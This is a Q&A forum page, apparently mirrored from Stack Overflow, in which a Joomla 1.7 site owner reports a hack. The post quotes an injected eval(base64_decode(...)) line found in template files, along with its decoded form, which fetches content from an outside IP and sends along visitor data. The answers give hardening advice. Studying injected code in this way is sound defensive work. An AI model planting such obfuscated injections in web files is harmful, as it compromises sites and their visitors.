Logo Questions Linux Laravel Mysql Ubuntu Git Menu
HTML CSS JAVASCRIPT SQL PYTHON PHP BOOTSTRAP JAVA JQUERY R React Kotlin
 

Site backdoor & eval() [closed]

Tags:

php

joomla

joomla1.7

I'm running a Joomla 1.7 site which was hacked today. Below script did the hack.

eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJy8nIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKTsNCg0K")));

Above line was injected to my index.php file of the templates folder. Every template which was in the folder had the above code. In each file it was repeated few times.

When I decode the code, it outputs

print @file_get_contents('http://93.115.86.168/hlinks/links.php?ua=' . @urlencode($_SERVER['HTTP_USER_AGENT']) . '&req=' . @urlencode($_SERVER['HTTP_HOST'] . '/' . $_SERVER['REQUEST_URI']));

I removed the script and site happens to work fine. Script didn't do anything bad except site did not load at all.

My problem is even when I have set the file permission to 644 and folder permission to 755, How could this happen?

How can I figure out what caused the problem? What steps should I take to prevent happening this in the future?

UPDATE

This Forum Post Assistant / FPA is very helpful

like image 321
Techie Avatar asked Sep 06 '25 03:09

Techie

2 Answers

It is not reading a file from your file system, but rather reading directly from an external URL. You can disable reading from any external URL in php via the php.ini setting:

allow_url_fopen = 0
like image 172
sg- Avatar answered Sep 08 '25 00:09

sg-

How about because your running a Joomla 1.7 site? Joomla 1.7 is no longer supported and several security fixes have been added into Joomla since it was released. You should immediately upgrade to 2.5.9. There should be no backwards compatability issues as 2.5.9 is just the Long Term Supported Release of Joomla 1.7.

Check your PHP settings are as advised in the Joomla Security Checklist here. Make sure you PHP and MYSQL versions are reasonably up to date (at least PHP 5.3.x - preferably 5.4.x and MYSQL at least 5.0.4).

Finally make sure all your extensions are up to date. Again developers constantly update modules not just to add new features but also to add in extra/improved security or to protect against found vulnerabilities!

Also please not turning on allow_url_fopen like Steven says will result in Joomla's One-Click-Update to stop working properly.

like image 27
George Wilson Avatar answered Sep 08 '25 00:09

George Wilson
Sign in to Comment

Related questions

How to list files and folder in a dir (PHP) [duplicate]
TLS 1.2 not working in cURL
Fatal error: Uncaught TypeError: count(): Argument #1 ($var) must be of type Countable|array, null given in
Google Sitemap Date Format
Laravel use of concat with pluck method
Recursive Copy of Directory
Backup files to google drive using PHP
The GET method is not supported for route api/login. Supported methods: POST
Is it secure to make source code files writable by webserver? [duplicate]
how to store upload files in public folder in laravel 8
How to get the data from PUT HTTP Request (form-data)
Directus API : how to filter the results
Keccak-256 in PHP
Display product custom fields in cart next to each item name in Woocommerce
Asynchronous PHP Query with Ajax?
PHP: What if I call a static method in non-static way
How to store configuration settings for web app?
Upload Ajax file in yii2
IP address and the timestamp storage

Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!